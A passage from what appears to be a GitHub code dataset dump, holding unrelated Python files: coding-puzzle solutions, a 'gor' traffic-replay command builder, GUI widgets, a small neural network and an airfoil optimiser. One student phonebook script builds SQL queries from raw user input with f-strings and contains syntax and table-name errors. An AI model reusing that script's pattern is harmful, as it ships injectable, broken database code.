\"\"\"\n if head is None:\n return True\n\n first_half_end = self.end_of_first_half(head)\n second_half_start = self.reverse(first_half_end.next)\n\n first_node = head\n second_node = second_half_start\n while second_node is not None:\n if first_node.val != second_node.val:\n return False\n first_node = first_node.next\n second_node = second_node.next\n\n return True\n\n def end_of_first_half(self, head):\n slow = head\n fast = head\n while fast.next is not None and fast.next.next is not None:\n fast = fast.next.next\n slow = slow.next\n return slow\n\n def reverse(self, head):\n prev_node = None\n curr_node = head\n while curr_node is not None:\n next_node = curr_node.next\n curr_node.next = prev_node\n prev_node = curr_node\n curr_node = next_node\n return prev_node\n\n\n# O(N) and O(1)","repo_name":"Jay4869/Data-Science","sub_path":"Leetcode/234. Palindrome Linked List.py","file_name":"234. 
Palindrome Linked List.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"38667007471","text":"def solution(name):\n answer = 0\n name = list(name)\n Al1 = \"ABCDEFGHIJKLMN\"\n Al2 = \"AZYXWVUTSRQPO\"\n AA = \"A\" * len(name)\n\n for i in name:\n if i in Al1:\n answer += Al1.index(i)\n else:\n answer += Al2.index(i)\n ind = 0\n\n while True :\n name[ind] = \"A\"\n if name == list(AA):\n break\n a , b = 1 , 1\n while name[ind - a] == \"A\":\n a += 1\n while name[ind + b] == \"A\":\n b += 1\n answer += min(a,b)\n ind += -a if a 0:\n return [\"--input-tcp\", (\":%d\" % self.configuration.input.port)]\n raise GorCommandException(\"TCP port %s has to be greater than 0\" % self.configuration.input.port)\n return []\n\n def _input_raw(self):\n if InputType.RAW == self.configuration.input.type:\n if self.configuration.input.port > 0:\n return [\"--input-raw\", (\":%d\" % self.configuration.input.port)]\n raise GorCommandException(\"RAW port %s has to be greater than 0\" % self.configuration.input.port)\n return []\n\n def _append_rate(self, host, global_rate):\n if host.get(\"rate\", None):\n return '\"%s|%s\"' % (host[\"host\"], host[\"rate\"])\n elif global_rate:\n return '\"%s|%s\"' % (host[\"host\"], global_rate)\n return '\"%s\"' % host[\"host\"]\n\n def _output_tcp(self, host):\n host_port = host[\"host\"].split(\":\")\n if len(host_port) < 2:\n hostname = host[\"host\"]\n else:\n hostname = host_port[0]\n\n if Validator.is_hostname(hostname):\n return [\"--output-tcp\", self._append_rate(host, self.configuration.output.tcp.rate)]\n raise GorCommandException(\"Output's TCP host %s has incorrect format\" % host[\"host\"])\n\n def _output_tcps(self):\n if not self.configuration.output.tcp:\n return []\n\n target_hosts = self.configuration.output.tcp.hosts\n if len(target_hosts) == 0:\n raise GorCommandException(\"List of output's TCP hosts is empty\")\n\n output_tcps = []\n for target_host in target_hosts:\n output_tcps += self._output_tcp(target_host)\n return output_tcps\n\n def _output_http(self, host):\n if Validator.is_url(host[\"host\"]):\n return [\"--output-http\", self._append_rate(host, self.configuration.output.http.rate)]\n raise GorCommandException(\"Output's HTTP host %s has incorrect format\" % host[\"host\"])\n\n def _output_https(self):\n if not self.configuration.output.http:\n return []\n\n target_hosts = self.configuration.output.http.hosts\n if len(target_hosts) == 0:\n raise GorCommandException(\"List of output's HTTP hosts is empty\")\n\n output_https = []\n for target_host in target_hosts:\n output_https += self._output_http(target_host)\n return output_https\n\n def _output_stdout(self):\n if self.configuration.output.stdout:\n return [\"--output-stdout\", \"true\"]\n return []\n\n def _exit_after(self):\n if self.configuration.finish_after:\n return [\"--exit-after\", self.configuration.finish_after]\n return []\n\n def _split_output(self):\n if self.configuration.output.split_traffic:\n return [\"--split-output\", \"true\"]\n return []\n\n def _http_allow_url(self, path):\n if Validator.is_url_path(path):\n return [\"--http-allow-url\", '\"%s\"' % path]\n raise GorCommandException(\"Allow path %s has incorrect format\" % path)\n\n def _http_allow_urls(self):\n if not self.configuration.input.paths:\n return []\n\n allow_urls = [self._http_allow_url(path) for path in self.configuration.input.paths.allow]\n return flat_array(allow_urls)\n\n def 
_http_disallow_url(self, path):\n if Validator.is_url_path(path):\n return [\"--http-disallow-url\", '\"%s\"' % path]\n raise GorCommandException(\"Disallow path %s has incorrect format\" % path)\n\n def _http_disallow_urls(self):\n if not self.configuration.input.paths:\n return []\n\n disallow_urls = [self._http_disallow_url(path) for path in self.configuration.input.paths.disallow]\n return flat_array(disallow_urls)\n\n def _http_rewrite_url(self, rewrite_path):\n if Validator.is_rewrite_path(rewrite_path):\n return [\"--http-rewrite-url\", '\"%s\"' % rewrite_path]\n raise GorCommandException(\"Rewrite path %s has incorrect format. Expects ':' as a delimiter.\" % rewrite_path)\n\n def _http_rewrite_urls(self):\n if not self.configuration.input.paths:\n return []\n\n rewrite_urls = [self._http_rewrite_url(path) for path in self.configuration.input.paths.rewrite]\n return flat_array(rewrite_urls)\n\n def _output_http_workers(self):\n # (Average number of requests per second)/(Average target response time per second)\n if self.configuration.output.http.workers >= 1:\n return [\"--output-http-workers\", str(self.configuration.output.http.workers)]\n return []\n\n def _extra_args(self):\n if self.configuration.extra_args:\n extra_args = [[key, '\"%s\"' % value] for key, value in self.configuration.extra_args.items()]\n return flat_array(extra_args)\n return []\n\n def _gor(self):\n if os.path.exists(self.gor_path):\n return [self.gor_path]\n raise GorCommandException(\"Not found 'gor' application in path: %s\" % self.gor_path)\n\n def build(self):\n args = []\n\n if self.as_root:\n args += [\"sudo\"]\n\n args += self._gor()\n\n if self.configuration:\n args += self._input_raw()\n args += self._input_tcp()\n\n args += self._http_allow_urls()\n args += self._http_disallow_urls()\n args += self._http_rewrite_urls()\n\n args += self._output_https()\n args += self._output_http_workers()\n args += self._output_tcps()\n\n args += self._split_output()\n args += self._output_stdout()\n\n args += self._exit_after()\n args += self._extra_args()\n\n return args\n\n def build_string(self):\n return \" \".join(self.build())\n\n\nif __name__ == '__main__':\n conf = ConfigurationReader.read(\"example_cloner_service_in.json\")\n command = GorCommand(conf).build_string()\n print(command)\n","repo_name":"banan1988/python","sub_path":"cloner_v2/gor.py","file_name":"gor.py","file_ext":"py","file_size_in_byte":6650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11016077826","text":"def reverseWords(s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n\n def reverseword(word):\n new_list = []\n for each in word:\n new_list.insert(0, each)\n return ''.join(new_list)\n\n word_list = s.split(\" \")\n new_word_list = []\n for each in word_list:\n new_word_list.append(reverseword(each))\n\n return ' '.join(new_word_list)\n\n\n\nprint(reverseWords(\"hello nihao\"))","repo_name":"NeilWangziyu/Leetcode_py","sub_path":"reverseWord.py","file_name":"reverseWord.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"42105061502","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\nfrom languages.fields import LanguageField\n\n\nclass MyUser(AbstractUser):\n\n display_name = models.CharField(\n max_length=50,\n null=True,\n blank=True\n )\n\n email = models.EmailField(\n verbose_name=\"Email Address\",\n max_length=255,\n 
unique=True\n )\n\n language = LanguageField(\n max_length=8,\n blank=True,\n default=\"eng\"\n )\n\n bio = models.TextField(\n null=True,\n blank=True,\n help_text=\"A little about yourself. Do you like cheese, for instance?\"\n )\n\n avatar = models.ImageField()\n\n is_online = models.BooleanField(\n default=False\n )\n\n is_active = models.BooleanField(\n default=True\n )\n\n is_admin = models.BooleanField(\n default=False\n )\n","repo_name":"knmarvel/djangochannels","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27749123297","text":"import psycopg2\r\n\r\nhostname = 'localhost'\r\ndatabase = 'postgres'\r\nusername = 'postgres'\r\npwd = 'qwerty'\r\nport_id = 5432\r\n\r\nconn = None\r\ncur = None\r\n\r\nsql = 'select * from phone'\r\n\r\n# in the block try we will write request to tables\r\n\r\ntry:\r\n # connect to exist database\r\n\r\n conn = psycopg2.connect(\r\n host = hostname,\r\n dbname = database,\r\n user = username,\r\n password = pwd,\r\n port = port_id)\r\n cur = conn.cursor()\r\n \r\n # the cursor for perfoming database operations\r\n \r\n # create a new table\r\n cur.execute('DROP TABLE IF EXISTS phone')\r\n\r\n create_script = '''CREATE TABLE IF NOT EXISTS phone(\r\n id int\r\n name varchar(40) NOT NULL,\r\n number int)'''\r\n cur.execute(create_script)\r\n \r\n\r\n \r\n # insert data into a table\r\n insert_script = '''INSERT INTO phone (id, name, number) VALUES(%s, %s, %s)''' #2 %s folders for 2 column\r\n insert_values = [(1,'James', 880055) , (2,'Rob', 87764), (3,'Mary', 756)]\r\n for record in insert_values:\r\n cur.execute(insert_script, record)\r\n\r\n print(\"Record by pattern\")\r\n variant = input()\r\n if variant == \"y\":\r\n pattern = input(\"Enter pattern... \")\r\n search = input(\"Search in... \")\r\n '''if search == \"name\":\r\n search_sql = f\"select (user_id, username, numbers) from phone where \\\"username\\\" like '%{pattern}%';\"\r\n cur.execute(search_sql)\r\n if search == \"number\":\r\n number = input(\"Enter number...\")\r\n search_sql = f\"select (user_id, username, numbers) from phone where where \\\"numbers\\\" like '%{pattern}%';\"'''\r\n \r\n search_sql = f\"select * from phone where \\\"{search}\\\" like '%{pattern}%';\"\r\n cur.execute(search_sql)\r\n str_search = cur.fetchall()\r\n print(str_search)\r\n \r\n\r\n print(\"Do you want add new user\")\r\n variant = input()\r\n if variant == \"y\":\r\n id = input(\"Enter id... \")\r\n name = input(\"Enter name... 
\")\r\n number = input(\"Enter phone number...\")\r\n cur.execute(f\"select * from from phonebook where \\\"username\\\" like '%{pattern}%';\")\r\n print(len(cur.fetchall()))\r\n if len(cur.fetchall()) > 0 :\r\n cur.execute(f\"update phonebook set \\\"username\\\" = '{name}' where \\\"user_id\\\" = '{id}';\")\r\n cur.execute(f\"update phonebook set \\\"numbers\\\" = '{name}' where \\\"user_id\\\" = '{id}';\")\r\n else:\r\n cur.execute(f\"insert into phonebook (user_id, username, numbers) values ({id}, '{name}', {number});\")\r\n \r\n \r\nexcept Exception as error:\r\n print(error)\r\n\r\nfinally:\r\n if conn is not None:\r\n conn.close()\r\n if cur is not None:\r\n cur.close()\r\n","repo_name":"AriRangmad/pp2-20B030116","sub_path":"2att/sis11/sis11_newuser.py","file_name":"sis11_newuser.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72663213208","text":"# 여러 지역 날씨를 검색 후 캡처 저장하는 코드\n\nimport pyautogui\nimport time\nimport pyperclip\n\nweather = ['서울 날씨', '시흥 날씨', '청주 날씨', '부산 날씨', '강원도 날씨']\n\naddr_x = 1377 \naddr_y = 296\nstart_x = 1005 \nstart_y = 317\nend_x = 1830\nend_y = 817\n\nfor region_weather in weather:\n pyautogui.moveTo(addr_x, addr_y, 1)\n time.sleep(0.2)\n pyautogui.click()\n time.sleep(0.2)\n pyautogui.write('www.naver.com', interval=0.1)\n pyautogui.write(['enter'])\n time.sleep(1)\n \n pyperclip.copy(region_weather)\n pyautogui.hotkey('ctrl', 'v')\n time.sleep(0.5)\n pyautogui.write(['enter'])\n time.sleep(1.0)\n path = f'project\\{int(10)}.automouse\\{region_weather}.png' \n pyautogui.screenshot(path, region=(start_x, start_y, end_x-start_x, end_y-start_y))\n","repo_name":"AlexMJY/project_with_python","sub_path":"project/automouse_webpage/main10-4.py","file_name":"main10-4.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14123980175","text":"import tkinter\r\nimport random\r\nfrom typing import Optional, Callable, Union\r\n\r\nimport customtkinter\r\n\r\nfrom utils import gui as gui_utils\r\n\r\n\r\nclass FloatSpinbox(customtkinter.CTkFrame):\r\n def __init__(\r\n self,\r\n *args,\r\n start_index: int = 1,\r\n max_value: Union[int] = 100,\r\n width: int = 100,\r\n height: int = 32,\r\n step_size: Union[int, float] = 1,\r\n command: Callable = None,\r\n **kwargs\r\n ):\r\n super().__init__(*args, width=width, height=height, **kwargs)\r\n\r\n self.step_size = int(step_size)\r\n self.max_value = int(max_value)\r\n self.command = command\r\n\r\n self.configure(fg_color=(\"gray78\", \"gray21\"))\r\n\r\n self.grid_columnconfigure((0, 2), weight=0)\r\n self.grid_columnconfigure(1, weight=1)\r\n\r\n self.subtract_button = customtkinter.CTkButton(self, text=\"-\", width=height-6, height=height-6,\r\n command=self.subtract_button_callback)\r\n self.subtract_button.grid(row=0, column=0, padx=(3, 0), pady=3)\r\n\r\n self.entry = customtkinter.CTkEntry(self, width=width-(2*height), height=height-6, border_width=0, fg_color=\"gray16\")\r\n self.entry.grid(row=0, column=1, columnspan=1, padx=3, pady=3, sticky=\"ew\")\r\n\r\n self.add_button = customtkinter.CTkButton(self, text=\"+\", width=height-6, height=height-6,\r\n command=self.add_button_callback)\r\n self.add_button.grid(row=0, column=2, padx=(0, 3), pady=3)\r\n\r\n self.entry.insert(0, start_index)\r\n\r\n def add_button_callback(self):\r\n if self.command is not None:\r\n self.command()\r\n try:\r\n value = 
int(self.entry.get()) + self.step_size\r\n if value > self.max_value:\r\n value = self.max_value\r\n self.entry.delete(0, \"end\")\r\n self.entry.insert(0, value)\r\n except ValueError:\r\n return\r\n\r\n def subtract_button_callback(self):\r\n if self.command is not None:\r\n self.command()\r\n try:\r\n value = int(self.entry.get()) - self.step_size\r\n if value < 1:\r\n value = 1\r\n self.entry.delete(0, \"end\")\r\n self.entry.insert(0, value)\r\n except ValueError:\r\n return\r\n\r\n def get(self) -> Union[float, None]:\r\n try:\r\n return float(self.entry.get())\r\n except ValueError:\r\n return None\r\n\r\n def set(self, value: float):\r\n self.entry.delete(0, \"end\")\r\n self.entry.insert(0, str(int(value)))\r\n\r\n\r\nclass CTkEntryWithLabel(customtkinter.CTkFrame):\r\n \"\"\"\r\n Entry with a label\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n master,\r\n label_text: str,\r\n\r\n textvariable: Optional[Union[tkinter.StringVar, tkinter.Variable]] = None,\r\n\r\n on_text_changed: Optional[Callable] = None,\r\n on_focus_in: Optional[Callable] = None,\r\n on_focus_out: Optional[Callable] = None,\r\n\r\n width: int = 140,\r\n height: int = 28,\r\n\r\n state: str = tkinter.NORMAL,\r\n\r\n hide_on_focus_out: bool = False,\r\n **kwargs\r\n ):\r\n super().__init__(master, fg_color=\"transparent\")\r\n\r\n self.on_text_changed = on_text_changed if on_text_changed is not None else lambda: None\r\n self.on_focus_in = on_focus_in if on_focus_in is not None else lambda: None\r\n self.on_focus_out = on_focus_out if on_focus_out is not None else lambda: None\r\n\r\n self.label = customtkinter.CTkLabel(\r\n self,\r\n text=label_text,\r\n )\r\n self.label.grid(row=0, column=0, padx=0, pady=0, sticky=\"w\")\r\n\r\n self.entry = customtkinter.CTkEntry(\r\n self,\r\n state=state,\r\n textvariable=textvariable,\r\n width=width,\r\n height=height,\r\n\r\n **kwargs\r\n )\r\n\r\n if state == tkinter.DISABLED:\r\n self.entry.configure(fg_color=\"gray25\", border_color=\"gray25\")\r\n\r\n self.entry.grid(row=1, column=0, padx=0, pady=0, sticky=\"w\")\r\n self.entry.bind(\"\", self.text_changed)\r\n\r\n self.text = textvariable.get().strip() if isinstance(textvariable, tkinter.StringVar) else \"\"\r\n self.is_shortened = False\r\n if hide_on_focus_out:\r\n shortened_string = gui_utils.shorten_long_string(self.text)\r\n self.entry.configure(textvariable=tkinter.StringVar(value=shortened_string))\r\n self.is_shortened = True\r\n\r\n self.entry.bind(\"\", self.focus_in)\r\n self.entry.bind(\"\", self.focus_out)\r\n\r\n def get(self):\r\n return self.entry.get().strip()\r\n\r\n def bind(self, sequence, command, add=True):\r\n self.entry.bind(sequence, command, add)\r\n\r\n def show_full_text(self):\r\n self.entry.configure(textvariable=tkinter.StringVar(value=self.text))\r\n self.is_shortened = False\r\n\r\n def hide_full_text(self):\r\n text = gui_utils.shorten_long_string(self.text)\r\n self.entry.configure(textvariable=tkinter.StringVar(value=text))\r\n self.is_shortened = True\r\n\r\n def text_changed(self, event):\r\n self.text = self.entry.get().strip()\r\n\r\n self.on_text_changed()\r\n\r\n def focus_in(self, event):\r\n self.on_focus_in()\r\n\r\n self.show_full_text()\r\n\r\n def focus_out(self, event):\r\n self.on_focus_out()\r\n\r\n self.hide_full_text()\r\n\r\n def set_text_changed_callback(self, callback: Callable):\r\n self.entry.bind(\"\", lambda event: callback())\r\n\r\n def set_click_callback(self, callback: Callable):\r\n self.entry.bind(\"\", lambda event: callback())\r\n\r\n def 
set_focus_in_callback(self, callback: Callable):\r\n self.on_focus_in = callback\r\n\r\n def set_focus_out_callback(self, callback: Callable):\r\n self.on_focus_out = callback\r\n\r\n\r\nclass CTkCustomTextBox(customtkinter.CTkTextbox):\r\n def __init__(\r\n self,\r\n master,\r\n grid: dict,\r\n text: str,\r\n height: int = 100,\r\n font: tuple = (\"Consolas\", 14),\r\n ):\r\n super().__init__(master=master, font=font, fg_color='gray14')\r\n self.configure(height=height)\r\n self.grid(**grid)\r\n self.insert(\"1.0\", text)\r\n\r\n\r\nclass ComboWithRandomCheckBox:\r\n def __init__(\r\n self,\r\n master,\r\n grid: dict,\r\n options: list,\r\n text: str = \"Random\",\r\n combo_command: Optional[Callable] = lambda _: None,\r\n ):\r\n self.options = options\r\n\r\n self.combobox = customtkinter.CTkComboBox(\r\n master=master,\r\n values=options,\r\n width=130,\r\n command=combo_command\r\n )\r\n self.combobox.grid(**grid)\r\n\r\n self.random_checkbox = customtkinter.CTkCheckBox(\r\n master=master,\r\n text=text,\r\n checkbox_width=18,\r\n checkbox_height=18,\r\n onvalue=True,\r\n offvalue=False,\r\n command=self.random_checkbox_event,\r\n )\r\n self.random_checkbox.grid(row=grid[\"row\"] + 1, column=grid[\"column\"], padx=20, pady=5, sticky=\"w\")\r\n\r\n def random_checkbox_event(self):\r\n if self.random_checkbox.get():\r\n self.combobox.configure(\r\n state=\"disabled\",\r\n fg_color='#3f3f3f',\r\n )\r\n else:\r\n self.combobox.configure(\r\n state=\"normal\",\r\n fg_color='#343638',\r\n )\r\n\r\n def get_value(self):\r\n if self.random_checkbox.get():\r\n return random.choice(self.options)\r\n return self.combobox.get()\r\n\r\n def get_checkbox_value(self):\r\n return self.random_checkbox.get()\r\n\r\n def set_values(self, combo_value: str):\r\n\r\n if combo_value.lower() == 'random':\r\n self.combobox.configure(\r\n state=\"disabled\",\r\n fg_color='#3f3f3f',\r\n )\r\n self.random_checkbox.select()\r\n else:\r\n self.combobox.configure(\r\n state=\"normal\",\r\n fg_color='#343638',\r\n )\r\n self.combobox.set(combo_value)\r\n self.random_checkbox.deselect()\r\n","repo_name":"frankmurrey/starknet_drop_helper","sub_path":"gui/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":8423,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"31"} +{"seq_id":"35131387137","text":"import copy\nclass NeuralNetwork:\n\n def __init__(self,a):\n self.optimizer = a\n self.loss = []\n self.layers = []\n self.data_layer = None\n self.loss_layer = None\n self.input =None\n\n def forward(self):\n\n self.input = self.data_layer.forward()\n output = self.layers[0].forward(self.input[0])\n for i in range(len(self.layers)-1):\n output = self.layers[i+1].forward(output)\n\n loss = self.loss_layer.forward(output, self.input[1])\n\n return loss\n\n def backward(self):\n\n #loss = self.loss_layer.forward(output, self.data_layer.forward()[1])\n e = self.loss_layer.backward(self.input[1])\n for i in range(len(self.layers)):\n e = self.layers[len(self.layers)-i-1].backward(e)\n\n return e\n\n def append_trainable_layer(self,layer):\n layer.optimizer = copy.deepcopy(self.optimizer)\n self.layers.append(layer)\n\n\n\n def train(self,iterations):\n for i in range(iterations):\n self.loss.append(self.forward())\n self.backward()\n\n def test(self,input_tensor):\n\n output_test = self.layers[0].forward(input_tensor)\n for i in range(len(self.layers) - 1):\n output_test = self.layers[i + 1].forward(output_test)\n\n return 
output_test\n\n\n","repo_name":"fourier28/Deep-Learning","sub_path":"ex2/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2348069308","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\n## 첫번째 방법 - ![시간초과]!\r\n###가지고 있는 숫자카드 입력\r\n##num_get = int(input())\r\n##getN = list(map(int,input().split()))\r\n## \r\n###제시된 숫자카드 입력\r\n##num_sug = int(input())\r\n##sugN = list(map(int,input().split()))\r\n##\r\n##result = []\r\n##for n in sugN:\r\n## if n in getN:\r\n## result.append(1)\r\n## else:\r\n## result.append(0)\r\n##\r\n###출력\r\n##for n in result:\r\n## print(n, end=' ')\r\n\r\n#두번째 방법\r\nplus_n = [0]*(10**7) + [0]\r\nminus_n = [0]*(10**7) + [0]\r\n\r\nnum_get = int(input())\r\ngetN = list(map(int,input().split()))\r\nfor n in getN:\r\n if n>=0:\r\n plus_n[n] = 1\r\n else:\r\n minus_n[-n] = 1\r\n \r\n\r\nnum_sug = int(input())\r\nsugN = list(map(int,input().split()))\r\n\r\nresult = []\r\nfor n in sugN:\r\n if n>=0:\r\n result.append(plus_n[n])\r\n else:\r\n result.append(minus_n[-n])\r\n\r\n#출력\r\nfor n in result:\r\n print(n, end=' ')\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n","repo_name":"Lee-seung-won/elegance_Baekjoon","sub_path":"10815.py","file_name":"10815.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24372812834","text":"import random\nfrom math import factorial\nimport math\n\nimport numpy\n#import pymop.factory\n\n#ディープ\nfrom deap import algorithms\nfrom deap import base\n#from deap.benchmarks.tools import igd\nfrom deap import creator\nfrom deap import tools\n\n#プロット\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D # 3Dグラフ作成のため\n\n#id取得\nimport os\n\nimport sys\nimport traceback\n\n#並列処理\nfrom multiprocessing import Pool,Value\n\n#自作モジュール\nimport foilConductor as fc\nimport XfoilAnalize as xa\n\ndef decoder(individual,code_division):\n #遺伝子を混合比にデコード\n ratios = []\n for i in range(0,len(individual),code_division):\n ratio = 0\n for j in range(code_division):\n ratio += individual[i+j]\n ratios.append(ratio)\n return ratios\n\n#=====================================================\n#親翼型の選択\n#=====================================================\nobj1_max = 1\nobj2_max = 1\nobj3_max = 1\nfoil_path = 'foils/'\ndatfiles = ['AG24.dat','AG14.dat','AG16','AG38.dat','SD8040 (10%).dat','SD7084 (9.6%).dat','SD7037.dat']\n#---------------------------------------\n#フィルにパスをつなぐ\nfor i in range(len(datfiles)):\n datfiles[i] = foil_path + datfiles[i]\n#---------------------------------------\n\n#=====================================================\n#最適化の定義\n#=====================================================\nNOBJ = 3#評価関数の数\n#K = 10\ncode_division = 6#混合比率をコードにする際の分解数\nNDIM = len(datfiles)*code_division#遺伝子数=親翼型の数×比率の分解能\nP = 12\nH = factorial(NOBJ + P - 1) / (factorial(P) * factorial(NOBJ - 1))\nBOUND_LOW, BOUND_UP = -5.0/code_division, 5.0/code_division#遺伝子定義域\n#problem = pymop.factory.get_problem(PROBLEM, n_var=NDIM, n_obj=NOBJ)#ベンチマーク\n\nMU = 400#人口の数#int(H + (4 - H % 4))\n#print(MU)\nNGEN = 200#世代数\nCXPB = 1.0#交叉の確立(1を100%とする)\nMUTPB = 1.0#突然変異の確立(1を100%とする)\n\n# Create uniform reference point\nref_points = tools.uniform_reference_points(NOBJ, P)\n\n# Create classes\ncreator.create(\"FitnessMin\", base.Fitness, weights=(-1.0,) * NOBJ)\ncreator.create(\"Individual\", list, 
fitness=creator.FitnessMin)\n##\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#評価関数の定義\n#(いじるのは基本この中)\ndef evaluate(individual):\n global code_division\n ratios = decoder(individual, code_division)\n #===========================================\n #翼型を混合し、新翼型のdatファイルを書き出す\n #==========================================\n datlist_list = [fc.read_datfile(file) for file in datfiles]\n datlist_shaped_list = [fc.shape_dat(datlist) for datlist in datlist_list]\n newdat = fc.interpolate_dat(datlist_shaped_list,ratios)\n #foilpara == [最大翼厚、最大翼厚位置、最大キャンバ、最大キャンバ位置、S字の強さ]\n foil_para = fc.get_foil_para(newdat)\n\n mt, mta, mc, mca, s = foil_para\n #print(obj1_max,obj2_max,obj3_max)\n #--------------------\n #翼の形に関する拘束条件\n penalty = 0\n print('===================')\n if(mc<0):\n print(\"out of the border\")\n print(\"reverse_cmaber\")\n penalty -= mc\n if(mt<0.08):\n print(\"out of the border\")\n print(\"too_thin\")\n penalty += 0.08-mt\n if(mt>0.11):\n print(\"out of the border\")\n print(\"too_fat\")\n penalty += mt-0.11\n #if(foil_para[4]>0.03):\n # print(\"out of the border\")\n # print(\"peacock\")\n # print('===================')\n # return (1.0+(foil_para[4]-0.03),)*NOBJ\n if(mta<0.23):\n print(\"out of the border\")\n print(\"Atama Dekkachi!\")\n penalty += 0.23 - mta\n if(mta>0.3):\n print(\"out of the border\")\n print(\"Oshiri Dekkachi!\")\n penalty += mta - 0.3\n\n if penalty > 0:\n return [1.0 + penalty]*NOBJ\n #--------------------\n id = str(os.getpid())\n dir_path = 'dump'\n try:\n os.makedirs(dir_path)\n except FileExistsError:\n pass\n newfile_name = 'newfoil' + id + '.dat'\n foilfile = fc.write_datfile(datlist=newdat,newfile_name = dir_path + '/' + newfile_name)\n\n #==========================================\n #新翼型の解析\n #==========================================\n set1 = xa.XfoilAnalize(cseq=[0.4,1.1,0.1],foilfile=foilfile,polar=\"polar1\" + id)\n #set2 = xa.XfoilAnalize(foilfile=newfile_name,polar=\"polar2\" + id,Re=150000,cl=0.5)\n #set3 = xa.XfoilAnalize(foilfile=newfile_name,polar=\"polar3\" + id,Re=100000,cl=0.5)\n\n try:\n Lrlist = set1.Cseq(timeout=9)[\"Lrlist\"]\n maxLr = max(Lrlist)\n maxindex = Lrlist.index(maxLr)\n\n #==========================================\n #目的値\n #==========================================\n obj1 = 1/Lrlist[0]#揚抗比の最大化\n obj2 = abs(Lrlist[maxindex] - Lrlist[maxindex+1])#揚抗比のピークを滑らかに(安定性の最大化)\n obj3 = foil_para[4]#下面の反りを最小化(製作再現性の最大化)#abs(set2.OneCL()[\"Alpha\"]-set3.OneCL()[\"Alpha\"])\n\n #正規化\n obj1 = obj1 if obj1<=1 else 1.0#値域<1.0\n obj2 = obj2 if obj2<=1 else 1.0#値域<1.0\n obj3 = obj3 if obj3<=1 else 1.0#値域<1.0\n\n print(\"individual\",individual)\n print(\"evaluate\",obj1,obj2,obj3)\n print(\"max_thickness\",foil_para[0])\n print(\"at\",foil_para[1])\n print(\"max_camber\",foil_para[2])\n print(\"at\",foil_para[3])\n print(\"S\",foil_para[4])\n print('===================')\n except Exception as e:\n obj1,obj2,obj3=[1.0]*NOBJ\n traceback.print_exc()\n print(\"individual\",individual)\n print(\"evaluate\",obj1,obj2,obj3)\n print(\"max_thickness\",foil_para[0])\n print(\"at\",foil_para[1])\n print(\"max_camber\",foil_para[2])\n print(\"at\",foil_para[3])\n print(\"S\",foil_para[4])\n print('===================')\n\n return [obj1,obj2,obj3]\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n# Toolbox initialization\ndef uniform(low, up, size=None):\n try:\n return [random.uniform(a, b) for a, b in zip(low, up)]\n except TypeError:\n return [random.uniform(a, b) for a, b in zip([low] * size, [up] * size)]\n##\ntoolbox = 
base.Toolbox()\ntoolbox.register(\"attr_float\", uniform, BOUND_LOW, BOUND_UP, NDIM)\ntoolbox.register(\"individual\", tools.initIterate, creator.Individual, toolbox.attr_float)\ntoolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n\ntoolbox.register(\"evaluate\",evaluate)\ntoolbox.register(\"mate\", tools.cxSimulatedBinaryBounded, low=BOUND_LOW, up=BOUND_UP, eta=30.0)\ntoolbox.register(\"mutate\", tools.mutPolynomialBounded, low=BOUND_LOW, up=BOUND_UP, eta=20.0, indpb=1.0/NDIM)\ntoolbox.register(\"select\", tools.selNSGA3, ref_points=ref_points)\n\ndef main(seed=None):\n    global obj1_max,obj2_max,obj3_max, CXPB, MUTPB\n    pool = Pool(4)#number of parallel workers (leave empty to use the maximum)\n    toolbox.register(\"map\", pool.map)\n\n    random.seed(seed)\n\n    # Initialize statistics object\n    stats = tools.Statistics(lambda ind: ind.fitness.values)\n    stats.register(\"avg\", numpy.mean, axis=0)\n    stats.register(\"std\", numpy.std, axis=0)\n    stats.register(\"min\", numpy.min, axis=0)\n    stats.register(\"max\", numpy.max, axis=0)\n\n    logbook = tools.Logbook()\n    logbook.header = \"gen\", \"evals\", \"std\", \"min\", \"avg\", \"max\"\n\n    pop = toolbox.population(n=MU)\n\n    #Evaluation of generation 0\n    # Evaluate the individuals with an invalid fitness\n    invalid_ind = [ind for ind in pop if not ind.fitness.valid]\n    fitnesses = toolbox.map(toolbox.evaluate, invalid_ind)\n    for ind, fit in zip(invalid_ind, fitnesses):\n        ind.fitness.values = fit\n\n    #Statistics of generation 0\n    # Compile statistics about the population\n    record = stats.compile(pop)\n    logbook.record(gen=0, evals=len(invalid_ind), **record)\n    print(logbook.stream)\n\n    #Prepare for plotting\n    plt.ion()\n\n    #Start of the evolution\n    # Begin the generational process\n    for gen in range(1, NGEN):\n        offspring = algorithms.varAnd(pop, toolbox, CXPB, MUTPB)\n        #Evaluation\n        # Evaluate the individuals with an invalid fitness\n        invalid_ind = [ind for ind in offspring if not 